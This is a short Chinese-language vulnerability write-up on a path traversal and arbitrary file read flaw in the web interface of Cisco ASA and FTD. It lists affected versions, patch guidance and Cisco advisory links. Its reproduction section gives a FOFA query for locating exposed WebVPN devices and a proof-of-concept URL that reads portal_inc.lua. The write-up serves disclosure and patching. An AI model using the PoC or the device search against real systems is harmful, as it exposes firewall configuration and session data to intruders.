CISCO ASA遠程任意檔案讀取
0X00簡介
Cisco Adaptive Security Appliance (ASA)是思科的一種防火墻設備,
0X01漏洞概述
Cisco Adaptive Security Appliance (ASA)防火墻設備以及Cisco Firepower Threat Defense (FTD)設備的web管理界面存在未授權的目錄穿越漏洞和遠程任意檔案讀取漏洞,攻擊者只能查看web目錄下的檔案,無法通過該漏洞訪問web目錄之外的檔案,該漏洞可以查看webVpn設備的配置資訊,cookies等,
0X02影響版本
Cisco ASA 設備影響版本:
- <9.6.1
- 9.6 < 9.6.4.42
- 9.71
- 9.8 < 9.8.4.20
- 9.9 < 9.9.2.74
- 9.10 < 9.10.1.42
- 9.12 < 9.12.3.12
- 9.13 < 9.13.1.10
- 9.14 < 9.14.1.10
Cisco FTD設備影響版本:
- 6.2.2
- 6.2.3 < 6.2.3.16
- 6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
- 6.4.0 < 6.4.0.9 + Hot Fix
- 6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
- 6.6.0 < 6.6.0.1
0X03漏洞復現
FOFA檢索規則
FOFA: “webVpn”
Poc為https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
標紅為讀取的檔案名
0X04漏洞修復
安裝Cisco ASA/TFD 最新補丁,進行補丁升級,
具體可以參考:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
0X05參考連接
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://twitter.com/aboul3la/status/1286809567989575685
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/860.html
標籤:其他